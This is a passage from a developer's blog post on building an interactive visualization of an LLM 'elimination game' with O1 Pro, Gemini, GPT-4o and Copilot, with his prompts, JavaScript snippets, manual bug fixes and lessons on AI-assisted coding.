“Generate a fractal” changed from a single Mandelbrot image to an explorer you can zoom, drag, and reset with sliders and the mouse wheel.
“Generate a dashboard” jumped from static charts to a live page with smooth card animations, modern fonts, and a real-time stats box.
A few observations.
Models are getting much more reliable. Even a low-cost model like GPT-4.1 Nano wrote error-free code across ~100 retries.
When pushed, they tend to brag. They attach grand titles like “Ultimate Interactive Circle” or “Galactic Data Universe”. They spin out flashy descriptions like “This dramatically upgraded clock features a pulsating neon glow, animated pulsing background glow, highly stylized tick marks, …”
A simple prompt like “Improve it” can spark new ideas and reveal unexpected features.
SUMMARY: using LLMs and AI code editors makes me a bit faster. It took me 7 hours instead of 10-12. But more importantly:
I procrastinate less. (“Oh, LLMs will make it easy.”)
I get stuck less. (“Oh, LLMs will know that.”)
I avoid ambitious designs less. (“Oh, LLMs will figure something out.”)
Also: GitHub Copilot is almost as good as Cursor at editing code, but slower at applying the edits. I’m perfectly happy recommending the free tier for beginners.
Here’s a breakdown of the process I followed, along with the most insightful lessons I learned.
Research usefulness
I usually visualize data for fun. But Naveen’s voice pops into my head, asking, “But Anand, what’s the use of all this?” So, I asked O1 Pro: “What are ways in which this can help Straive push its AI business?”
Then I added my requirements (which took 10-15 minutes to think of.)
I would like to visualize each game interactively. The authors have created a visualization that looks like the image attached. I would like to do better. Specifically, I’d like to:
Allow the user to step through each stage or play each step in sequence, jumping to any step. (They should be able to link to any step as well.)
Show the game, round, sub-round prominently
Show what the model is saying or thinking NEXT to the model, making it easy to read
Show alliance proposals and rejections as they form, ideally moving the models around as they seek to pair up. Rejections and replacements should be clearly visible
Once alliances are formed, group models together
Clearly show the voting process: who voted to eliminate which model, and how many elimination votes each model has received
Clicking on each model should show all the model’s thoughts and messages up to that point
Keeping these in mind, suggest diverse ways to visualize each step of the game. The primary goal is to make the game easy to follow and understand and tell a GRIPPING, ENGAGING story about the politics of LLMs. Like a Survivor reality show.
I asked both O1 Pro and Gemini 2.5 Pro (exp) for visualization ideas. I liked Gemini’s better. For example, Gemini said,
“Private Conversations: Dim the main stage slightly. Highlight the currently conversing pair.
“Voting Booth Visualization: As each private_vote_reason appears, briefly show the voter’s avatar and their reason text (maybe in a “thought bubble” style) next to the target they intend to vote for.”
But O1 Pro gave me a few powerful ideas. The best was an alliance table:
“Create a table with columns representing each model, rows representing rounds. Each cell shows the ID of the ally that model allied with in that round. If it’s 3+ consecutive alliances, collapse them with a vertical line. If the model was eliminated or had no alliance, leave it blank or use a placeholder icon.”
Learnings:
💡 Ask LLMs for visualization ideas. They’ll suggest things you didn’t think of.
💡 Ask multiple LLMs. Each has a different style of thinking.
Prototype the visual
I stitched together pieces of the UI description and asked GPT-4o to create an image. This took 10-15 minutes. Private chat:
Here’s how I plan to visualize this.
Overall Interface & Navigation
Timeline Scrubber: A prominent timeline at the bottom or top, showing rounds and sub-rounds (conversations, pairing, voting, elimination). Users can click, drag, or use next/prev buttons to navigate. Each step should be linkable (e.g., using URL hashes). Add play/pause controls for auto-stepping.
Game State Dashboard: Always visible area showing: Game ID, Round, Sub-round, Players Remaining, Players Eliminated (Jury).
Central Stage Layout: Models represented as avatars (could be simple circles/icons or more thematic representations) arranged in a central area. Their positions and connections change based on game events.
1. Public Conversation (Round Start)
Talking Heads Circle: Arrange player avatars in a circle. When a player “speaks” (their message appears in the log):
Highlight their avatar.
Display their message in a speech bubble next to them.
Fade previous messages slightly or stack them briefly.
Engaging Element: Animate the avatar slightly (e.g., subtle pulse or glow) when they speak.
Chat Feed Style: A more traditional chat interface on one side, linked to avatars on the main stage. Clicking a message highlights the avatar and vice-versa.
Engaging Element: Use distinct colors or icons for each player avatar and their corresponding messages.
2. Alliance Formation (Proposals & Pairing)
Proposal: An animated arrow or beam shoots from the proposer’s avatar to the target’s avatar. Display text like “P1 proposes to P6 (Rank 0)”.
Acceptance: The arrow solidifies, perhaps pulsing gently. A “Matched” icon appears.
Rejection: The arrow bounces off or shatters. A “Rejected” icon appears briefly.
Replacement: Show the existing accepted proposal being visually “bumped” or overridden by the new accepted one. Clearly label it “Replaced Px”.
Engaging Element: Physically move the avatars closer when a proposal is made, snapping them together when accepted, and pushing them apart on rejection. Use distinct sounds for proposal, acceptance, rejection, replacement.
Preference List Display: When hovering or clicking a player, show their ranked preference list as they build it during this phase. Highlight the status (proposed, accepted, rejected).
Final Pairs: Once preference_result occurs, rearrange the avatars so matched pairs are visually grouped together on the stage, perhaps connected by a clear line or within a shared bounding box.
3. Private Conversations (Paired Chats)
Private Chat Rooms: Dim the main stage slightly. Highlight the currently conversing pair. Display their private messages in separate chat windows or adjacent speech bubbles clearly linked to the pair.
Engaging Element: Use a “spotlight” effect on the active pair. Allow users to click other pairs to view their simultaneous conversations.
Connection Lines: Draw lines between the paired avatars during this phase. Clicking a line could bring up the conversation history for that pair in that round.
Engaging Element: Make the line pulse or glow when new messages are exchanged between the pair.
4. Voting (Reasons & Votes)
Voting Booth Visualization:
As each private_vote_reason appears, briefly show the voter’s avatar and their reason text (maybe in a “thought bubble” style) next to the target they intend to vote for.
As each vote occurs, draw a clear, perhaps slightly dramatic, animated arrow from the voter to the target avatar.
Vote Tally: Display a running count of votes received next to each player’s avatar (e.g., a red badge with the number). Increment this visibly as each vote comes in.
Engaging Element: Use a distinct color (e.g., red) for voting arrows. Add a subtle “target lock” animation on the player receiving a vote. Show if the vote was public or private (maybe different arrow styles).
5. Elimination
Spotlight & Fade: When the elimination event occurs:
Put a dramatic spotlight on the eliminated player.
Display the reason (tie-break, random pick if applicable).
Visually “grey out” or fade the eliminated player’s avatar and move them to a designated “Jury Box” area.
Engaging Element: A brief, dramatic animation or sound effect for elimination. Update the “Players Remaining/Eliminated” dashboard instantly.
6. Jury Speeches & Voting (Final Round)
Finalist Stage: Place the two finalists prominently center stage. Move the Jury avatars to a visible “Jury Box”.
Speech Display: As each finalist gives their speech (subround: 900), display it clearly next to their avatar, perhaps like a closing statement.
Jury Deliberation:
As each private_jury_reason appears, briefly highlight the juror and show their reasoning (maybe visible only on hover/click to avoid clutter).
Show jury votes accumulating for each finalist, similar to the elimination voting tally, but perhaps with a different visual style (e.g., gold stars).
Engaging Element: Build suspense by revealing jury votes one by one or after a short delay.
7. Final Results
Winner Announcement: A clear “Winner” banner or crown appears over the winning avatar.
Rank Display: Show the final ranks clearly, perhaps arranging avatars on a podium or listing them with their rank and partial points.
Game Summary: Offer a summary view showing key stats or moments from the game.
Interactivity (Clicking on Models)
Player Dossier: Clicking any avatar (active or jury) should open a panel or overlay showing:
Player ID & Model Type.
Their full message history (public and private, filterable by round/type).
Their voting history (who they voted for, who voted for them).
Their alliance history (proposals made/received, final pairs).
Their final rank/status.
Engaging Element: Use this panel to show hidden information like private_vote_reason after the vote has occurred.
Draw the user interface for this EXACTLY as it would appear on the screen.
Here’s the prototype it created.
Based on this, I drew my own, revised visual:
Learnings:
💡 LLMs can create visual prototypes. ChatGPT’s new 4o image generation converted the description into an acceptable image. Needs to improve, but enough to ideate.
💡 Improving is less work than creating. I rarely sketch visualizations. (Too lazy.) But since this prototype was there, and had some parts that were WRONG, I just had to fix it! 🙂
Break down the task
I then described the application and asked O1 Pro to break down this task. Private chat:
The URL looks like /#?game=286&line=4 indicating that game 286.jsonl must be loaded and line 4 is the current step we’re in.
The navbar has:
An app title
A game state dashboard with the game number (dropdown), round (number), stage (e.g. voting, alliances, etc.), players (number of players still active)
A timeline scrubber (a range slider) allowing users to jump to the specific line. This changes the URL which then triggers a change in app state.
A light/dark theme picker
The stage on the left as a set of models arranged in a circle. Each model/player has a unique and distinct color, a number inside it indicating the player number, a label above it indicating the model name (e.g. GPT-4o), a set of red dots below it when it receives an elimination vote, an arrow pointing from one model to another when a model talks to, plans an alliance with, or votes to eliminate another model. The arrow color depends on the action. When a model performs any action (speaking publicly / privately, voting, allying, etc.) the conversation or action summary is displayed in a semi-transparent overlay at the center of the circle. Eliminated models are shown with a 10% opacity. Allied models are redrawn next to each other with a line connecting them.
The sidebar on the right has 3 collapsible sections.
CHAT: Shows the history of each model’s public or private conversations. Each conversation begins with a circle with the model/player number in the same color as on the stage, followed by the model name. For private conversations, this is followed by an arrow pointing to the target model/player’s numbered & colored circle. This is followed by the text of the conversation. Private conversations are in a light red background.
ALLIANCES. This is a tabular representation where columns are models that form an alliance. Each row represents a round. The cells contain the model the model in the column header allied with. All models are numbered and colored. If a model in the column header was eliminated, the cell is empty. If it did not ally, the cell shows an empty grey circle. If 3+ consecutive cells show the same model in a column (i.e. the model did not switch alliances), we can replace the middle cells with a vertical line.
ELIMINATIONS. This tabular representation works exactly the same way as alliances, except it captures eliminations. Each column represents a model that voted for elimination. Each row represents a round. The cell contains the model the model in the column header voted to eliminate. All models are numbered and colored. If a model in the column header was eliminated, the cell is empty. If 3+ consecutive cells show the same model in a column (i.e. a model consistently voted against the same model), we can replace the middle cells with a vertical line.
I’d like to use an AI code generator to generate this visualization. Giving the entire spec at once is too much for it to build. I’d like to see the output step by step as well and propose changes. How might I break up this task?
Here’s its (rather good) breakdown:
Plan Your Data Structures
Basic Backend/Server Setup (If Needed)
Minimal Front-End with a Single View
Implement the Timeline Scrubber & URL Sync
Core Stage Visualization (Circle of Players)
Arrow/Line Visualization for Actions
Sidebar 1: CHAT Section
Sidebar 2: ALLIANCES Section
Sidebar 3: ELIMINATIONS Section
Refinements, Theming, & Final Touches
Learnings:
💡 Ask LLMs to break down your task. Its breakdown was better than mine.
To document my workflow, I decided to commit each stage of progress. At this point, I made the first commit to the repo documenting the process so far.
I skipped Step 1 (my mistake – I was forced to do it later) and didn’t need Step 2 (Backend/Server). So I began scaffolding, i.e. Step 3: Minimal Front-End with a Single View.
Create an index.html using Bootstrap via CDN. Scaffold it with a navbar
The navbar has:
An app title (Elimination Game)
A game state dashboard with the Game (dropdown), Round (number), Stage (e.g. voting, alliances, etc.), and Players (number of players still active)
A timeline scrubber (a range slider) allowing users to jump to the specific line. This changes the URL which then triggers a change in app state.
A light/dark theme picker. Here is the code for the theme picker. Use the same CDN links overall
<!-- Include Bootstrap 5.3+ and Bootstrap icons -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css" rel="stylesheet">
<link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.css" rel="stylesheet">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/js/bootstrap.bundle.min.js"></script>
<nav class="navbar navbar-expand-lg bg-body-tertiary">
  <div class="container-fluid">
    <a class="navbar-brand" href="#">Navbar</a>
    <!-- Copy this dropdown anywhere in your page, e.g. inside a navbar -->
    <div class="position-relative" role="group" aria-label="Toggle dark mode" title="Toggle Dark Mode">
      <button class="dark-theme-toggle btn btn-primary dropdown-toggle" type="button" data-bs-toggle="dropdown" aria-expanded="false" aria-label="Open navigation menu">
        <i class="bi bi-circle-half"></i> <span class="d-lg-none ms-2">Toggle theme</span>
      </button>
      <ul class="dropdown-menu dropdown-menu-end">
        <li><button class="dropdown-item" data-bs-theme-value="light"><i class="me-2 bi bi-sun-fill"></i> Light</button></li>
        <li><button class="dropdown-item" data-bs-theme-value="dark"><i class="me-2 bi bi-moon-stars-fill"></i> Dark</button></li>
        <li><button class="dropdown-item" data-bs-theme-value="auto"><i class="me-2 bi bi-circle-half"></i> Auto</button></li>
      </ul>
    </div>
  </div>
</nav>
Below the navbar is a section with a stage on the left and a sidebar on the right. The stage on the left will contain a large responsive square SVG. The sidebar on the right contains 3 collapsible cards: Chat, Alliances, Eliminations.
It generated this scaffolding.
Learnings:
💡 Claude 3.5 Sonnet remains an excellent model to generate UI. Claude 3.7 Sonnet is even better, but is not currently available in the free Copilot subscription.
💡 Coders micro-manage LLMs. I think a novice will be more efficient and get better results than me. For example:
Did I need to give it the code snippet? Could I have given it a link?
Did I need to say “a range slider” or specify that Round must be a “number”, etc? Could it have inferred?
I gave some feedback on the scaffolding and asked for improvements.
Make the navbar always dark
The sidebar cards must be independently collapsible
For the Game, Round, Stage, and Players, show the label above the value. The label must be small and the value must be large.
Use only me-* margins on the navbar to ensure that there is no left margin mis-aligning the elements at low width. Also place the elements inside a collapsible navbar section at low widths
The stage must have a bottom margin to avoid touching the sidebar’s top on low-width screens
This was the result:
That prompted more feedback from me:
Prefer Bootstrap classes over <style> wherever possible.
Style the “Game” to look exactly like the round, stage, and players. The size of the label and value should match for all 4 elements perfectly.
Ensure that the labels round, stage, players will be visible in light mode against the dark navbar.
At this point, I made 3 manual edits because I felt I could do these better than the LLM:
Broke the “Elimination Game” in the navbar into 2 lines
Replaced fs-5 with fs-4 to get the values to have exactly the same size, and removed redundant styling on the game selection
Format document with HTML Language Features
Learnings:
💡 Experienced coders are good with feedback. It took me under 10 seconds to spot each problem in the output and code. Writing the feedback felt natural.
💡 Experienced coders need retraining to instruct rather than code. My instinct was to code immediately rather than to prompt.
As soon as I thought of one feedback, I had to fight the urge to fix it and write the feedback instead.
Even when instructing was easier, I chose to code it, e.g. breaking the “Elimination Game” title in the navbar into 2 lines.
Coding can be better if you don’t know what to do. I toggled the font size between fs-4 and fs-5 in rapid succession to figure out the right size.
But I could have experimented by asking the LLM to build a font size toggle or slider!
💡 LLMs could turn coders into good lead developers or managers. Pity.
On to Step 4: Implement the Timeline Scrubber & URL Sync.
I copied a few logs into a temporary logs/ folder and said:
Create a script.js as an ES module and include it from index.html.
On load, fetch logs/index.txt which contains all log files (*.jsonl), one per line.
The files are formatted as *_TIMESTAMP_YYYYMMDD_HHMMSS.jsonl.
Populate the game dropdown with these values. The option label should look like 25 Jan 2025, 10:30.
The default value for the game dropdown should be empty.
When the game dropdown changes to a non-empty option, fetch the file from logs/[filename] and store it in the global game, parsing the JSONL into an array of objects.
Set the maximum value of the range slider to the length of game.
When the range slider changes or the game dropdown changes, change the URL hash to #?game=[filename]&step=[range-slider-value] without modifying browser history.
When the URL hash changes through any means, call redraw(step) which will draw the current (global) game state at the step specified. For now, just display the step prominently on the stage.
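For reference, a minimal sketch of the kind of script.js this asks for might look like the following. This is not the generated code; element IDs like #gameSelect, #timelineScrubber and #stage, and the redraw stub, are assumptions.

```js
// Sketch: load the log index, keep the slider and URL hash in sync, and redraw.
const gameSelect = document.querySelector("#gameSelect"); // assumed element IDs
const slider = document.querySelector("#timelineScrubber");
let game = [];

// Files look like *_YYYYMMDD_HHMMSS.jsonl; format the label as "25 Jan 2025, 10:30"
function formatDate(filename) {
  const [, date, time] = filename.match(/_(\d{8})_(\d{6})/) ?? [];
  if (!date) return filename;
  const d = new Date(`${date.slice(0, 4)}-${date.slice(4, 6)}-${date.slice(6)}T${time.slice(0, 2)}:${time.slice(2, 4)}`);
  return new Intl.DateTimeFormat("en-GB", { dateStyle: "medium", timeStyle: "short" }).format(d);
}

const files = (await (await fetch("logs/index.txt")).text()).trim().split("\n");
gameSelect.innerHTML =
  `<option value=""></option>` +
  files.map((f) => `<option value="${f}">${formatDate(f)}</option>`).join("");

gameSelect.addEventListener("change", async () => {
  const text = await (await fetch(`logs/${gameSelect.value}`)).text();
  game = text.trim().split("\n").map((line) => JSON.parse(line));
  slider.max = game.length - 1;
  updateHash();
});
slider.addEventListener("input", updateHash);

// Update the hash without adding a browser history entry, then redraw
function updateHash() {
  history.replaceState(null, "", `#?game=${gameSelect.value}&step=${slider.value}`);
  redraw(+slider.value);
}

// If the hash changes by any other means (e.g. a pasted URL), sync the slider and redraw
window.addEventListener("hashchange", () => {
  const step = new URLSearchParams(location.hash.split("?")[1] ?? "").get("step") ?? 0;
  slider.value = step;
  redraw(+step);
});

// Placeholder: just show the current step prominently on the stage
const redraw = (step) => (document.querySelector("#stage").textContent = `Step ${step}`);
```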
This code worked fine, but I like refactoring, so I tried to condense the 111-line code:
Shorten and simplify the code in script.js to be elegant.
Use browser functionality more.
For example, use Intl to format dates.
Change the innerHTML of #gameSelect to concisely update the options.
Remove redundant braces, e.g. for single-line blocks.
That brought it down to 74 lines but failed to populate the select dropdown. Rather than debug, I undid the change (Copilot’s Undo feature is cool!) and tried:
Shorten and simplify the code in script.js to be elegant.
Use browser functionality more, e.g. use Intl to format dates.
Prefer insertAdjacentHTML and replaceChildren.
Remove redundant braces, e.g. for single-line blocks.
This led to shorter code (69 lines) but still had the same issue. I had to manually correct this line (the regex has no named capture groups, so .groups was undefined and the date and time were lost):
// BEFORE
const [_, date, time] = filename.match(/_(\d{8})_(\d{6})/)?.groups ?? [];
// AFTER
const [_, date, time] = filename.match(/_(\d{8})_(\d{6})/) ?? [];
I also
Removed an incorrect px-2 against #gameSelect in index.html.
Decided to use the GitHub CDN and replaced fetch(logs/...) with fetch(https://raw.githubusercontent.com/sanand0/elimination_game/refs/heads/main/logs/...).
Also moved logs/index.txt into logs.txt and changed script.js accordingly
Formatted script.js with Prettier
Visually, nothing changed in a big way, but the slider and the dropdown now update the URL properly.
Learnings:
💡 Experienced coders suggest precise code improvements. Generally good ones. Like:
“use Intl to format dates”
“Prefer insertAdjacentHTML and replaceChildren” (over document.createElement)
💡 LLMs are good at refactoring. When I asked it to “Shorten and simplify the code in script.js to be elegant”, it reduced the code from 111 lines to 74 lines quite well!
💡 Redo if you don’t like it. Copilot’s “Undo” feature lets you retry until you get it right. Like in Edge of Tomorrow.
At this point, I needed a good data structure and felt the cost of skipping Step 1. But, rather than creating one, I asked ChatGPT:
I would like the game structure to be held in a simple JS object called game. What data structure would help the most in drawing this visual such that it will require very little code (since required information is in this data structure)?
O1 Pro said:
A very convenient way to minimize front-end logic is to store a “timeline of snapshots”: each step in the game has both the event (what just happened) and a “current state” (the entire world after that event). Then, in your UI, you simply pick the snapshot that corresponds to the current line (based on the timeline scrubber) and draw exactly what’s in that snapshot—no extra derivation needed.
This is a brilliant idea. I rarely use this since I’m biased against wasting memory. But in this case, it’s perfect.
Based on that input, I prompted Copilot:
In script.js, instead of loading the .jsonl into game, create this data structure to make it easy to visualize each step.
Use the sample .jsonl provided to infer the logic for this.
const game = {
  game: "...",
  players: {
    "P1": {
      "id": "Player2_Game1739872030683891_deepseek-fireworks", // from .player_id
      "model": "deepseek-fireworks", // everything after the last underscore
    },
    // and so on for all other players
  },
  // For each line, create a step
  steps: [
    {
      step: 0,
      // Current round and subround
      round: 1,
      subround: 1,
      event: {
        // Contents of the original line
      },
      // list active alliances
      active: { "P1": true, "P2": false, ... },
      // For each round so far, list who allied with who, e.g.:
      alliances: [ {"P1": "P6", "P2": "P7", ...}, ... ],
      // For each round so far, list who voted to eliminate whom, e.g.
      votes: [ {"P1": "P4", "P2": "P1", ... }, ... ],
    },
    // …and so on, for each line in the JSONL
  ]
};
This worked almost perfectly. I made these edits:
Add let currentAlliances = {}; let currentVotes = {}; which it forgot in the code.
Re-apply change #2 I made manually in the last iteration (replacing the URL with the GitHub CDN). That change was not there in the chat window, Copilot did not pick it up.
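Putting the pieces together, the snapshot-building loop ends up looking roughly like the sketch below. This is based on the structure above, not the generated code; the event field names (type, accepted, voter_id, eliminated_player, …) are assumptions inferred from the prompts, and the round bookkeeping is simplified.

```js
// Sketch: turn the parsed JSONL lines into one snapshot per step.
function buildSteps(lines, players) {
  const steps = [];
  let round = 1, subround = 1;
  let currentAlliances = {}; // the declarations Copilot forgot
  let currentVotes = {};
  const alliances = [], votes = []; // one entry per completed round
  const active = Object.fromEntries(Object.keys(players).map((p) => [p, true]));

  lines.forEach((event, i) => {
    if (event.round) round = event.round; // assumed: round/subround appear on events
    if (event.subround) subround = event.subround;
    // In the real code, long player_ids are mapped back to P1…P8 first.
    if (event.type === "preference_outcome" && event.accepted) currentAlliances[event.target] = event.accepted;
    if (event.type === "preference_result") {
      alliances.push({ ...currentAlliances }); // this round's alliances are now final
      currentAlliances = {};
    }
    if (event.type === "vote") currentVotes[event.voter_id] = event.target_id;
    if (event.type === "elimination") {
      votes.push({ ...currentVotes }); // this round's votes are now final
      currentVotes = {};
      if (event.eliminated_player) active[event.eliminated_player] = false; // assumed field name
    }
    steps.push({
      step: i,
      round,
      subround,
      event,
      active: { ...active },
      alliances: [...alliances],
      votes: [...votes],
    });
  });
  return steps;
}
```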
Learnings:
💡 Coders mess up LLMs. The data structure was the first step the LLM recommended. I skipped it. It proved crucial. LLMs alone do better than LLMs + coders – just as they do better than LLMs + doctors.
💡 LLMs can make basic mistakes. Like forgetting to declare variables.
Sidebar 2 & 3: ALLIANCES and ELIMINATIONS Sections
I jumped ahead to Steps 8 & 9. They were easier (just tables) and the visual components are independent, so the order doesn’t matter.
There are always 8 players. Pick 8 visually distinct dark colors (i.e. on which white will look good as a foreground) as colors: {P1: "#...", P2: ...}.
In the alliances and eliminations cards, draw a table each as follows. The table header is:
| Round | P1 | P2 | P3 | … | P8 |
Instead of P1, P2, etc. draw a badge with background-color based on colors and text as 1 for P1, etc.
steps[step].alliances is a list like [{P1: P7, P2: P3, …}, …]. Render each row as a list like:
| 1 | P7 | P3 | … |
The cell contents are badges exactly like the header. If a player (e.g. P3) does not have an alliance, i.e. steps[step].alliances[round].P3 is missing, leave it blank. If steps[step].active[P3] is false, grey the cell background.
steps[step].votes is almost identical, listing the elimination votes. Populate this in the eliminations card.
Reuse code for this. Write VERY concise code. Use Bootstrap classes as much as possible.
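The table code this produces looks roughly like the sketch below. The colors are placeholders and the helper names are mine, not the generated output.

```js
// Sketch: one table for alliances, one for votes, both built from the same helper.
const colors = { P1: "#1f6feb", P2: "#6f42c1", P3: "#d63384", P4: "#b02a37",
                 P5: "#b35900", P6: "#146c43", P7: "#0f5b66", P8: "#495057" }; // placeholder dark colors

// A numbered, colored badge for a player, e.g. "P3" -> a badge showing "3"
const badge = (p) => `<span class="badge" style="background-color: ${colors[p]}">${p.slice(1)}</span>`;

function drawTable(el, rows, active) {
  const players = Object.keys(colors);
  const header = `<tr><th>Round</th>${players.map((p) => `<th>${badge(p)}</th>`).join("")}</tr>`;
  const body = rows
    .map((row, i) => `<tr><td>${i + 1}</td>${players
      .map((p) => `<td class="${active[p] ? "" : "table-secondary"}">${row[p] ? badge(row[p]) : ""}</td>`)
      .join("")}</tr>`)
    .join("");
  el.innerHTML = `<table class="table table-sm align-middle">${header}${body}</table>`;
}

// Usage (assumed element IDs):
// drawTable(document.querySelector("#alliances"), game.steps[step].alliances, game.steps[step].active);
// drawTable(document.querySelector("#eliminations"), game.steps[step].votes, game.steps[step].active);
```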
This worked perfectly. I manually made one correction to an earlier mistake I noticed:
Replace slider.max = game.steps.length; with slider.max = game.steps.length - 1;
I decided to tweak this to show eliminated players clearly:
Replace the active data structure with eliminated. eliminated[“P1”] = 3 if P1 was eliminated at the end of round 3. eliminated[“P1”] is undefined if P1 is not eliminated.
Using this, in the alliances and elimination tables, color the cells grey only if the player was eliminated BEFORE that round. (We’ll find that only empty cells will be colored grey.)
Again, nearly perfect. I made one manual correction in the logic:
Replace game.steps[step].eliminated[p] <= i + 1 with game.steps[step].eliminated[p] < i + 1
Learnings:
💡 When all goes well, LLMs are surprisingly effective. Normally, this step takes me half an hour. Now, it took under 5 minutes.
💡 Watch out for subtle bugs. The change in operator (from “<=” to “<”) almost went unnoticed, but makes a big difference on when a player was eliminated.
Sidebar 1: CHAT Section
For each step, based on step[].event.type, populate the Chat section with the history of conversations so far:
conversation: This is a public conversation. Show ${event.player_id} ${event.message} with the player ID shown like the badge above. player_id needs to be looked up from game.players since it matches game.players[*].id.
private: This is a private conversation. Show ${event.speaker_id} 🢂 ${event.target_id} ${event.message} with the speaker and target IDs treated as above.
preference_proposal: This is an alliance proposal. Show ${event.proposer} 😍 ${event.target} #${event.rank_of_target}. proposer and target are like “P1”, “P2”, etc.
preference_outcome: This is the outcome of a proposal. Show ${event.target} ❌ ${event.rejected} if event.rejected else ${event.target} ❤️ ${event.accepted} ❌ ${event.replaced} if event.replaced else ${event.target} ❤️ ${event.accepted}. All these are like “P1”, “P2”, etc.
preference_result: This is the outcome of the entire proposal round. Just show “Alliances formed”
private_vote_reason: This is the reason a player gives to eliminate someone. Show ${event.voter_id} 👎 ${event.target_id} ${event.reason}. voter_id and target_id match game.players[*].id
private_revote_reason: Show Same as above
private_jury_reason: Show same as above.
vote: This is the actual vote. Show ${event.voter_id} 👎 ${event.target_id} like above
elimination: Just show “Elimination starts”
final_results: Show Winners: ${winners} where winners is a list of players like [“P5”]
ALL players should be shown as a colored badge with a number. The chat card height should not exceed 15em. Overflow should scroll beyond that. Make sure the chat rendering is elegant. I’ve mentioned the content, but please use any Bootstrap UI component to make the chat more attractive.
Use lit-html to render efficiently. Import it via:
import { render, html } from "https://cdn.jsdelivr.net/npm/lit-html@3/+esm";
Rewrite existing code inside redraw(), drawTable, drawBadge to use lit-html.
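After the rewrite, the chat rendering looks roughly like the sketch below. The helper names and the #chat container are assumptions; colors and the badge idea carry over from the table sketch above.

```js
import { render, html } from "https://cdn.jsdelivr.net/npm/lit-html@3/+esm";

// Map a long player_id back to "P1"…"P8" via game.players[*].id
const playerOf = (id) => Object.keys(game.players).find((p) => game.players[p].id === id);

// A numbered, colored badge as a lit-html template
const chip = (p) => html`<span class="badge me-1" style="background-color: ${colors[p]}">${p.slice(1)}</span>`;

// One chat line per event type (only a few types shown; the rest follow the same pattern)
const chatEntry = (e) => {
  if (e.type === "conversation") return html`${chip(playerOf(e.player_id))} ${e.message}`;
  if (e.type === "private") return html`${chip(playerOf(e.speaker_id))} 🢂 ${chip(playerOf(e.target_id))} ${e.message}`;
  if (e.type === "preference_proposal") return html`${chip(e.proposer)} 😍 ${chip(e.target)} #${e.rank_of_target}`;
  if (e.type === "vote") return html`${chip(playerOf(e.voter_id))} 👎 ${chip(playerOf(e.target_id))}`;
  return html`${e.type}`;
};

const drawChat = (step) =>
  render(
    html`<div class="overflow-auto" style="max-height: 15em">
      ${game.steps.slice(0, step + 1).map((s) => html`<div class="small border-bottom py-1">${chatEntry(s.event)}</div>`)}
    </div>`,
    document.querySelector("#chat"),
  );
```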
This worked perfectly.
Learnings:
💡 Careful and detailed prompting gets excellent results. I explained how to render each conversation type. That took time. But it helped build a reasonably complex visual in a single shot.
💡 LLMs are good at refactoring. It switched code from vanilla JS to lit-html templating like a pro.
Set the number of active players using len(game.players) – len(game.steps[].eliminated)
This worked perfectly. Then:
Update index.html and script.js to modify the sidebar as follows:
Keep the sidebar sections for chat, alliances and eliminations open by default.
Right align the “Round” column numbers in the alliances and eliminations tables.
Change the “Round” header to “#”
Rename the eliminations card section title to “Voting”
EVERY player badge should show game.players[P1/P2/…].model as a Bootstrap tooltip.
Add Bootstrap tooltips for the emojis
😍: proposed to
❌: rejected
❤️: accepted
👎: eliminated
Don’t indent or shade the chats that are currently indented and shaded (e.g. vote_reason).
If possible, beautify the chats further using Bootstrap classes.
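The tooltip part is mostly a matter of adding data-bs-toggle attributes to the badges and re-initializing Bootstrap’s Tooltip after each render, roughly like this (a sketch; html, colors and game come from the earlier sketches):

```js
// Badge with the model name as a Bootstrap tooltip (title comes from game.players[p].model)
const chip = (p) => html`<span class="badge me-1" style="background-color: ${colors[p]}"
  data-bs-toggle="tooltip" title="${game.players[p].model}">${p.slice(1)}</span>`;

// Call this after every render so tooltips attach to the newly created elements
const initTooltips = () =>
  document.querySelectorAll('[data-bs-toggle="tooltip"]')
    .forEach((el) => bootstrap.Tooltip.getOrCreateInstance(el));
```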
This worked perfectly too.
Learnings:
💡 LLMs will get confused with long instructions and/or codebases. It took 5 failed attempts before I split the prompts. Keep your prompts cohesive. Keep your code bases modular.
Now for the most complex visual of the lot. Step 5: Core Stage Visualization (Circle of Players) and Step 6: Arrow/Line Visualization for Actions.
Generate a square, responsive SVG in game stage using Bootstrap.
Import svg from lit-html and use svg where required.
It contains all players laid out in a circle.
Each player is a circle colored based on the player colors.
It contains the player number (1, 2, …) as text inside it in white.
Above the player circle, the player model is visible.
Leave plenty of space for a “center text” at the center of the circle that will contain centered text.
The text may be a full paragraph, so handle the font size and circle size accordingly.
The center text must have elegant rounded corners, and a background rgba(var(--bs-body-color-rgb), 0.1).
We need word wrapping, so use foreignElement to wrap a div which holds the text.
For each step, based on step[].event.type, draw the stage as follows:
conversation: Highlight (via a semi-transparent circle 2-3X the radius of the player) the player to highlight them. Show event.message in the center text.
private: Highlight player event.speaker_id. Draw a black arrow to event.target_id. Show event.message in the center text.
preference_proposal: Yellow arrow from event.proposer to event.target. Center text shows [MODEL NAME 1] proposes to [MODEL NAME 2] where model name is what’s in the tooltip
preference_outcome: (all items in [BRACKETS] are the model name shown in the tooltip)
If event.rejected, red arrow from event.target to event.rejected. Center text: [TARGET] rejects [REJECTED]
If event.replaced, green arrow from event.target to event.accepted and red arrow from event.target to event.replaced. Center text: [TARGET] accepts [ACCEPTED] replacing [REPLACED]
Else: green arrow from event.target to event.accepted. Center text: [TARGET] accepts [ACCEPTED] replacing [REPLACED]
preference_result: Center text shows “Alliances formed”
private_vote_reason: Purple arrow from event.voter_id to event.target_id. Center text: [VOTER_ID] thinks to eliminate [TARGET_ID]: event.reason
private_revote_reason: Show Same as above
private_jury_reason: Show same as above.
vote: Purple arrow from event.voter_id to event.target_id. Center text: [VOTER_ID] voted against [TARGET_ID]
elimination: Center text: “Elimination starts”
final_results: Center text: Show Winners: ${winners} where winners is a list of players like [“P5”]
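The heart of the stage is just trigonometry plus lit-html’s svg template. Below is a trimmed sketch of the idea, not the generated code: arrows and most event types are omitted, and the #stage container plus the game and colors globals are assumed from earlier.

```js
import { render, html, svg } from "https://cdn.jsdelivr.net/npm/lit-html@3/+esm";

// Sketch: lay the players out on a circle inside a square SVG and show the current event.
function drawStage(step) {
  const ids = Object.keys(game.players); // ["P1", …, "P8"]
  const pos = Object.fromEntries(
    ids.map((p, i) => {
      const angle = (2 * Math.PI * i) / ids.length - Math.PI / 2;
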